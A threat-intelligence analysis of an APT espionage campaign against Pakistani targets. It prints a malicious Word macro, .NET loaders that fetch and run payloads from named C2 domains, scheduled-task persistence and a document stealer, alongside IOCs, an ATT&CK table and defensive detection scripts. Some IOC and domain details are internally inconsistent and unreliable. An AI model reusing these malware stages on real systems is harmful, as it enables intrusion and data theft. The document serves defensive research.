Unraveling Confucius’ Espionage Campaigns

Background

Confucius, an Indian state-sponsored APT group, continues to target Defense and Government organizations in South Asia, especially Pakistan. The primary purpose of the threat actor (TA) appears to be conducting espionage campaigns and stealing information critical to the operations of the targeted institutes.

In August 2021, the release of Amnesty International’s advisory on Pegasus Spyware by Israel’s NSO Group caused major unrest among the country’s politicians and other elite individuals. Capitalizing on this unrest, Confucius began to lure such individuals with a two-part email sequence: the first email was a simple informational mail against Pegasus, and the second contained an encrypted document (with the document’s password mentioned in the same email). Technical analysis of the document and the entire attack chain points towards a well-thought-out espionage campaign, something new for Confucius.

In late September 2021, the same campaign was re-run; the only changes we witnessed were the domains used for payload acquisition and data exfiltration. The flow of the whole attack chain can be seen below:

Figure 1: Execution flow of complete attack chain

Reports of a potential intrusion by Confucius were first disclosed by researchers on Twitter. Analysis of the campaign by our researchers is discussed in detail in the following sections:

Macro-enabled Word Document

Confucius heavily relies on Microsoft Word documents to deliver spear-phishing emails to their targets. Previously, these Word documents had external relationships to malicious templates (for template injection). More recently, the group appears to have made a switch to using malicious VBA macros.

On Document_Open, the macro executes two functions: one to write the binary to disk (eventually loading it) and a second to update the caption of an image embedded within the document. The function MyColor reads the value of the Comments property of the active document, opens a handle to a file in the Temp directory, and writes the data (after converting it to binary) to disk.

    Sub Mycolor()
      Dim prop As DocumentProperty
      For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
          s = prop.Value
        End If
      Next
      fnum = FreeFile
      FName = Environ("TMP") & "\skfk.txt"
      Open FName For Binary As #fnum
      Put #fnum, , abc(CStr(s))
      Close #fnum
      fr = "'" & Environ("TMP") & "\skfk.txt" & "'"
      Result = "Powershell [Reflection.Assembly]::LoadFile(" & fr & ");$doo = New-Object Tysdf.Class1;$doo.sadkj()"
      CreateObject("WScript.Shell").Run Result, 0, True
    End Sub

Snippet 1: VBA Macros Embedded Inside Lure

Once written, the binary is loaded into memory from PowerShell via the .NET Reflection API (more specifically, the LoadFile method of the Reflection.Assembly class). LoadFile takes one parameter, the path to the .NET assembly. An object of Class1 is then instantiated and its sadkj procedure is called.

.NET Downloader/Loader

Static analysis of the binary suggests that it is in fact a dynamic-link library (.NET assembly) with a modified ‘compile timestamp’ pointing to 2050. The function sadkj instantiates another object of the same class and attempts to call the function sdlfghjgks from it.

    public void sadkj()
    {
      string str = Path.GetTempPath() + "skfk.txt";
      new Process
      {
        StartInfo =
        {
          FileName = "powershell.exe",
          Arguments = "[Reflection.Assembly]::LoadFile('" + str + "');$t = New-Object Tysdf.Class1;$t.sdlfghjgks()",
          WindowStyle = ProcessWindowStyle.Hidden
        }
      }.Start();
      Environment.Exit(0);
    }

Snippet 2: .NET Loader
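The two static traits noted above (a PE image stored under a .txt name, and a compile timestamp pointing to 2050) can be checked from the file header alone. The following triage sketch is an added example, not code from the original analysis; the function names, the analysis date and the sample header bytes are constructed for illustration.

```python
import os
import struct
from datetime import datetime, timezone

IMAGE_FILE_DLL = 0x2000          # COFF Characteristics bit: image is a DLL
PE_EXTENSIONS = {".dll", ".exe", ".sys", ".ocx"}

def pe_triage(name, data, now):
    """Return findings for one file, given its name and raw bytes."""
    findings = []
    if len(data) < 0x40 or data[:2] != b"MZ":
        return findings                      # no DOS header: not a PE image
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return findings
    # COFF header after the signature: Machine, NumberOfSections,
    # TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics
    fields = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    stamp, characteristics = fields[2], fields[6]
    ext = os.path.splitext(name)[1].lower()
    if ext not in PE_EXTENSIONS:
        kind = "DLL" if characteristics & IMAGE_FILE_DLL else "EXE"
        findings.append("PE %s stored with extension '%s'" % (kind, ext))
    built = datetime.fromtimestamp(stamp, tz=timezone.utc)
    if built > now:
        findings.append("compile timestamp in the future (%d)" % built.year)
    return findings

def sample_pe(stamp, characteristics):
    """Constructed header: only the fields pe_triage reads are populated."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, stamp, 0, 0, 0, characteristics)
    return dos + b"PE\0\0" + coff

NOW = datetime(2021, 10, 1, tzinfo=timezone.utc)   # constructed analysis date
STAMP_2050 = int(datetime(2050, 1, 1, tzinfo=timezone.utc).timestamp())
STAMP_2020 = int(datetime(2020, 1, 1, tzinfo=timezone.utc).timestamp())

if __name__ == "__main__":
    for finding in pe_triage("skfk.txt", sample_pe(STAMP_2050, 0x2102), NOW):
        print(finding)
```

A future timestamp on its own is weak evidence, since deterministic .NET builds write a hash-derived value into this field; it carries weight in combination with the extension mismatch.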

This function is interesting because it references a URL used to acquire a file from the C2 infrastructure (what looks like another DLL masquerading as a .TXT file). To summarize the function: it downloads the .TXT file from the URL referencing the domain inshaaldom.xyz, loads the assembly by converting the ASCII payload to binary via the moon function, acquires the types from the assembly, instantiates them, and dynamically invokes the ndmsbfl function from the newly acquired assembly.

    public void sdlfghjgks()
    {
      WebClient webClient = new WebClient();
      string uriString = "https://inshaaldom.xyz/SowpnTdb.txt";
      try
      {
        string sweiorut = webClient.DownloadString(new Uri(uriString));
        Type[] types = Assembly.Load(this.moon(sweiorut)).GetTypes();
        for (int i = 0; i < types.Length; i++)
        {
          object arg = Activator.CreateInstance(types[i]);
          if (Class1.<>o__3.<>p__0 == null)
          {
            Class1.<>o__3.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.RuntimeBinder.Binder.InvokeMember(CSharpBinderFlags.ResultDiscarded, "ndmsbfl", null, typeof(Class1), new CSharpArgumentInfo[]
            {
              CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null)
            }));
      ...
    }

Snippet 3: Payload Acquisition and Dynamic Invocation of Scheduler

.NET Task Scheduler  

Static analysis of SowpnTdb.txt (DLL) led us to identify some interesting strings. The embedded PDB path F:\Hacking Notes - Documents\Projects\project-05\SowpnTdb\SowpnTdb\bin\Release\ILMerge\SowpnTdb.pdb (in one of the intrusions from the campaign) indicated that several projects were lined up to continue the attack campaign. Several metadata fields of the binary pointed towards it being a Task Scheduler, likely acquired from GitHub. Recon on GitHub pointed towards a .NET wrapper for the Task Scheduler API exposed by Windows, which was a direct match for the codebase used by the Scheduler. This highlights the fact that Confucius utilizes open-source projects in their operations. We’ve also previously identified similar patterns of using open-source tools (OSTs) from their (potential) sister group, Sidewinder.

Analysis of the function ndmsbfl suggests it downloads another DLL (jksdfhk.txt) from the server (same domain as before) and drops it to C:\ProgramData. Following that, a task titled Systemcheck is scheduled to run a PowerShell command every five minutes. Scheduled commands are the previously covered dynamic invocation calls with the Reflection API being used to load the recently dropped DLL.

    public void ndmsbfl()
    {
      new WebClient().DownloadFile(new Uri("https://parinari.xyz/Msdjkfh.txt"), "C:\\ProgramData\\jksdfhk.txt");
      new TaskService();
      TimeTrigger trigger = new TimeTrigger
      {
          Repetition = new RepetitionPattern(TimeSpan.FromMinutes(5.0), TimeSpan.FromDays(0.0), false)
      };
      string path = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";
      string arguments = "-windowstyle hidden -C $rk = \"\"\"C:\\ProgramData\\jksdfhk.txt\"\"\[Reflection.Assembly]::LoadFile($rk);$tt = New-Object Msdjkfh.Class1;$tt.Nasuyd()\" ";
      TaskService.Instance.AddTask("Systemcheck", trigger, new ExecAction(path, arguments, null), null, null, TaskLogonType.InteractiveToken, null);
    }

Snippet 4: .NET Task Scheduler
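Both the macro in Snippet 1 and the Systemcheck task above run PowerShell with Assembly.LoadFile against a file that is not named .dll, and the task adds a short repetition interval and a hidden window. The audit sketch below checks exported scheduled-task XML and raw command lines for that combination; it is an added example, not part of the original analysis, and its function names, the 15-minute threshold and the sample task definition are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
LOADFILE = re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::LoadFile", re.I)
# Windows path ending in a short extension, delimited by quote, space, ';' or ')'.
PATH = re.compile(r"""[A-Za-z]:\\[^"';|]+?\.(\w{1,5})(?=["'\s;)]|$)""")
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
MINUTES = re.compile(r"^PT(\d+)M$")  # minute-granularity ISO 8601 durations only

def reflective_load_reasons(cmdline):
    """Heuristic: LoadFile in a command line plus a path that is not .dll/.exe."""
    if not LOADFILE.search(cmdline):
        return []
    reasons = ["Assembly.LoadFile in PowerShell command line"]
    for m in PATH.finditer(cmdline):
        if m.group(1).lower() not in ("dll", "exe"):
            reasons.append("assembly path with non-DLL extension: " + m.group(0))
    return reasons

def audit_task(xml_text, max_minutes=15):
    """Return the reasons a scheduled-task definition looks like this loader."""
    root = ET.fromstring(xml_text)  # task XML exported by a trusted collector
    reasons = []
    for interval in root.iterfind(".//t:Repetition/t:Interval", NS):
        m = MINUTES.match((interval.text or "").strip())
        if m and int(m.group(1)) <= max_minutes:
            reasons.append("repeats every %s min" % m.group(1))
    for action in root.iterfind(".//t:Exec", NS):
        command = action.findtext("t:Command", "", NS)
        arguments = action.findtext("t:Arguments", "", NS)
        if "powershell" in command.lower():
            if HIDDEN.search(arguments):
                reasons.append("hidden PowerShell window")
            reasons += reflective_load_reasons(arguments)
    return reasons

# Constructed sample, modelled on the Systemcheck task described above.
SAMPLE_TASK = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
 <Triggers><TimeTrigger><Repetition><Interval>PT5M</Interval></Repetition></TimeTrigger></Triggers>
 <Actions><Exec>
  <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
  <Arguments>-windowstyle hidden -C $rk = 'C:\ProgramData\jksdfhk.txt';[Reflection.Assembly]::LoadFile($rk);$tt = New-Object Msdjkfh.Class1;$tt.Nasuyd()</Arguments>
 </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for reason in audit_task(SAMPLE_TASK):
        print(reason)
```

The same `reflective_load_reasons` check applies to process-creation command lines, which is where the macro's PowerShell invocation would surface.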

Final .NET Loader

The final .NET loader has similar operations to what we’ve witnessed in the previous loader binaries. Here’s a summary of the operations in this particular loader:

  • Downloads another payload (Rwlksdnasjd.txt) from the domain, inshaaldom.xyz (a DLL masquerading as a TXT file)
  • The payload is converted into binary
  • Classes are instantiated from the recently converted binary
  • The function, sdsdjkfhds, is dynamically invoked

    public void Nasuyd()
    {
      WebClient webClient = new WebClient();
      string uriString = "https://parinari.xyz/Rwlksdnasjd.txt";
      try
      {
        string st = webClient.DownloadString(new Uri(uriString));
        Type[] types = Assembly.Load(this.Houn(st)).GetTypes();
        for (int i = 0; i < types.Length; i++)
        {
          object arg = Activator.CreateInstance(types[i]);
          if (Class1.<>o__1.<>p__0 == null)
          {
            Class1.<>o__1.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.RuntimeBinder.Binder.InvokeMember(CSharpBinderFlags.ResultDiscarded, "sdsdjkfhds", null, typeof(Class1), new CSharpArgumentInfo[]
            {
              CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null)
            }));
          }
      ...
    }

Snippet 4: Final .NET loader

Stealer

Continuing the analysis with the last invoked function, sdsdjkfhds: the metadata of the DLL (Rwlksdnasjd.txt) and several network calls inside the DLL further support the conclusion that it is in fact an uploader. A snippet of the function is listed below:

    public void sdsdjkfhds()
    {
      string userName = Environment.UserName;
      List<string> pfhl = new List<string>();
      string pattern = "*";
      pfhl = this.Gpufh();
      "C:\\\\Users\\\\" + userName;
      string tdn = Environment.MachineName + "__" + userName;
      this.CUD(tdn, 0);
      foreach (string text in Directory.GetDirectories("C:\\Users\\"))
      {
        if (text != "C:\\Users\\Default" || text != "C:\\Users\\Public")
        {
          this.GF(text + "\\Documents\\", pattern, "Documents", pfhl);
          this.GF(text + "\\Downloads\\", pattern, "Downloads", pfhl);
          this.GF(text + "\\Desktop\\", pattern, "Desktop", pfhl);
          this.GF(text + "\\Pictures\\", pattern, "Pictures", pfhl);
        }
      }
      DriveInfo[] drives = DriveInfo.GetDrives();
      char[] trimChars = new char[]
      {
        ':',
        '\\'
      };
      foreach (DriveInfo driveInfo in drives)
      {
        if (driveInfo.Name != "C:\\")
        {
          this.GF(driveInfo.Name, pattern, driveInfo.Name.TrimEnd(trimChars), pfhl);
        }
      }
      Environment.Exit(0);
    }

Snippet 5: Stealer and Uploader

Capabilities of the Stealer are:

  • Collect information on all local drives
  • Download a file of MD5 hashes (specific to the machine and username of the compromised workstation) from the C2 server
  • Find and exfiltrate files with extensions TXT, PDF, PNG, JPG, ODS, DOC, XLS, XLM, ODP, ODT, RTF, PPT, PPTX, XLSX, XLSM, DOCX, JPEG
  • Files are hashed (MD5) before being exfiltrated and compared against the MD5 hash list previously acquired from the C2 server. Files which have already been exfiltrated are not uploaded to the server again

    private void GF(string path, string pattern, string ufn, List<string> pfhl)
    {
      ...
      try
      {
        list.AddRange(Directory.GetFiles(path, pattern, SearchOption.TopDirectoryOnly));
        foreach (string text in list)
        {
          ...
          if (a == "txt" || a == "TXT" || a == "pdf" || a == "PDF" || a == "png" || a == "PNG" || a == "jpg" || a == "JPG" || a == "DOC" || a == "doc" || a == "XLS" || a == "xlm" || a == "XLM" || a == "xls" || a == "odp" || a == "ODP" || a == "ods" || a == "ODS" || a == "odt" || a == "ODT" || a == "rtf" || a == "RTF" || a == "ppt" || a == "PPT" || a2 == "xlsx" || a2 == "XLSX" || a2 == "xlsm" || a2 == "XLSM" || a2 == "docx" || a2 == "DOCX" || a2 == "pptx" || a2 == "PPTX" || a2 == "jpeg" || a2 == "JPEG")
          {
            list2.Add(text);
          }
        }
        ...
        foreach (string text3 in list2)
        {
          if (!(text3 == ""))
          {
            string item;
            using (MD5 md = MD5.Create())
            {
              using (FileStream fileStream = File.OpenRead(text3))
              {
                item = BitConverter.ToString(md.ComputeHash(fileStream)).Replace("-", "");
              }
            }
            if (!pfhl.Contains(item))
            {
              list3.Add(text3);
              list4.Add(item);
            }
          }
        }
      }
      if (list3.Count != 0)
      {
        this.CUD(text2, 1);
        ...
      }
      ...
    }

Snippet 6: Capabilities of the Stealer
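Because the stealer skips files whose MD5 is already on the per-host hash list, that list doubles as a record of what has left the machine. The sketch below uses it for incident scoping: given a recovered list, it separates in-scope files that were already uploaded from those that were still pending. It is an added example, not code from the original analysis; it assumes responders have recovered the hash list for the host, and the function names and sample files are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path

# Extensions targeted by the stealer, as listed above.
TARGET_EXT = {"txt", "pdf", "png", "jpg", "ods", "doc", "xls", "xlm", "odp",
              "odt", "rtf", "ppt", "pptx", "xlsx", "xlsm", "docx", "jpeg"}

def md5_hex_upper(path):
    """Upper-case hex MD5 with no separators, the form the snippet produces."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest().upper()

def exposure_report(roots, recovered_hashes):
    """Split in-scope files into (already exfiltrated, not yet uploaded).

    Over-approximates the stealer on purpose: extensions are matched in any
    letter case and directories are walked recursively (assumption; the
    elided parts of the snippet do not show how subfolders are handled).
    """
    known = {h.strip().upper() for h in recovered_hashes if h.strip()}
    exfiltrated, pending = [], []
    for root in roots:
        for path in sorted(Path(root).rglob("*")):
            if path.is_file() and path.suffix.lstrip(".").lower() in TARGET_EXT:
                bucket = exfiltrated if md5_hex_upper(path) in known else pending
                bucket.append(str(path))
    return exfiltrated, pending

def demo():
    """Constructed sample: three files, one of them on the recovered list."""
    with tempfile.TemporaryDirectory() as tmp:
        docs = Path(tmp, "Documents")
        docs.mkdir()
        (docs / "budget.xlsx").write_bytes(b"constructed sample A")
        (docs / "notes.TXT").write_bytes(b"constructed sample B")
        (docs / "tool.iso").write_bytes(b"not a targeted type")
        # Lower-case on purpose: the comparison must normalise case.
        recovered = [hashlib.md5(b"constructed sample A").hexdigest()]
        sent, pending = exposure_report([docs], recovered)
        return [Path(p).name for p in sent], [Path(p).name for p in pending]

if __name__ == "__main__":
    print(demo())
```

Files modified after upload hash differently and land in the pending bucket, so the exfiltrated list is a lower bound on exposure.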

Although the payload acquisition domain encrypts its communication with the compromised host (via HTTPS), the exfiltration domain, thakithaiya.xyz, uses the plain-text HTTP protocol to send and receive data from the C2 server. Similar to the earlier campaigns carried out by Confucius, the web pages are written in PHP (with random URIs and parameter names to collect usernames/machine name). Since the task is scheduled to run every five minutes, the uploader runs the same routine over and over, collecting files and folders from the system, until terminated.

Indicators of Compromise

The following Indicators of Compromise were discovered during the course of our intrusion analysis:

File Name
Ticket00073146.docm
Tysdf.dll (skfk.txt)
Msdjkfh.dll (jksdfhk.txt)
Rwlksdnasjd.dll (Stealer)
SowpnTdb.txt (Scheduler)

File Paths

| File Path | Description |
|---|---|
| %Temp%\skfk.txt | .NET DLL dropped by the Word document; used to load the next stage into memory |
| C:\ProgramData\jksdfhk.txt | .NET DLL dropped by SowpnTdb.dll; used to load the next stage into memory |

Scheduled Tasks

| Task Name | Task Occurrence |
|---|---|
| Systemcheck | Every five minutes |

Domains/IPv4 Addresses

| Domain Name | Protocol | Usage | IPv4 Address |
|---|---|---|---|
| thakithaiya.xyz | HTTP | Exfiltration | 80.209.238.155 |
| pirnaram.xyz | HTTP | Exfiltration | 34.98.99.30, 62.77.153.51 |
| inshaaldom.xyz | HTTPS | Payload Acquisition | 104.21.10.162, 172.67.146.1 |
| C:\ProgramData\jksdfhk.txt | HTTPS | Payload Acquisition | 34.98.99.30, 104.21.86.125, 172.67.219.211 |

YARA Rules

YARA rules to detect the Loader and Stealer used by Confucius in their recent cyber-espionage campaigns can be found at our GitHub repository.

Tactics, Techniques and Procedures

The following tactics, techniques, and procedures are actively used by Confucius in their intrusions:

| ID | Name | Description |
|---|---|---|
| T1598 | Gather Victim Identity Information | Confucius extensively gathers the victim’s identifying information to target them via effective lures |
| T1583 | Acquire Infrastructure | Confucius acquires new infrastructure (discussed in next techniques) a month before each new campaign |
| T1583.001 | Acquire Infrastructure: Domains | Confucius typically registers two new domains as part of their infrastructure; one to acquire payloads from and another to exfiltrate data to |
| T1583.004 | Acquire Infrastructure: Server | Confucius acquires virtual private servers to acquire payloads from and exfiltrate data to during the Command and Control phase |
| T1566 | Phishing/Spearphishing Attachment | Confucius heavily relies on Spearphishing (attachments) to compromise their targets. Targeted emails in the past lured users into opening attachments (often encrypted; passwords being mentioned in the email’s content) by utilizing decoy documents including Payrolls, Pegasus (defenses against it), and others |
| T1053.005 | Scheduled Task/Job: Scheduled Task | Confucius schedules a Task on the compromised system to re-execute the malicious payload (every five minutes) |
| T1036 | Masquerading | Dynamic-link library (.DLL) files used by Confucius to load the payload from subsequent stages were masquerading as .TXT (plain-text) files on the filesystem |
| T1083 | File and Directory Discovery | The final-stage stealer deployed by Confucius extensively searches the filesystem for matches on particular file extensions and exfiltrates the identified files to the C2 server |
| T1082 | System Information Discovery | The final-stage stealer deployed by Confucius also collects information about the compromised system such as drives, machine name, and users for exfiltration and later downloading hash lists for comparisons |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Confucius heavily relies on the reflection API exposed by PowerShell to load/execute their DLLs in memory leaving minimal footprints on the compromised system’s disk |
| T1005 | Data from Local System | Confucius collects data such as files and folders from the compromised system in an automated fashion to exfiltrate to their server |
| T1071.001 | Application Layer Protocol: Web Protocols | Confucius serves its command and control server using the web protocols, HTTP and HTTPS |
| T1573.002 | Encrypted Channel: Asymmetric Cryptography | Confucius uses Asymmetric Cryptography to encrypt its communication over web protocols and communicate with the C2 server |
| T1041 | Exfiltration over C2 Channel | Confucius exfiltrates data collected from the compromised system to the C2 channel |
| T1029 | Scheduled Transfer | Scheduled jobs also implement a schedule to transfer/exfiltrate files from the compromised system and acquire a hash file to match hashes against and exclude files which have already been delivered to Confucius’ C2 server |

Operational Security Failure

While performing reconnaissance against the infrastructure of Confucius, we found a deviation from their normal pattern of operations. Confucius makes heavy use of C2 domains bought from the registrar GoDaddy, using different US-based addresses to do so. However, the primary C2 domain in the recent campaign, inshaaldom.xyz, and the C2 domain used in the campaign in August 2021, parinari.xyz, were both registered from Chandigarh, India. We consider this to be an operational mistake by the operators behind Confucius, revealing their origin.

Figure 2: C2 domain registered in India deviating from usual domain registration pattern of Confucius

Outlook

The techniques selected by Confucius are not very sophisticated at the moment, and the group has made some operational security failures; however, analysis of the campaign highlighted the creativity of its operators and their potential to increase sophistication in the future.

Previous campaigns by Confucius utilized techniques like Template Injection in spear-phishing documents; however, the current campaign makes use of macros and an embedded PE in the comments of a picture inside the document. These minor changes in techniques suggest the group is actively looking to switch their tradecraft to avoid detections based on named rulesets.
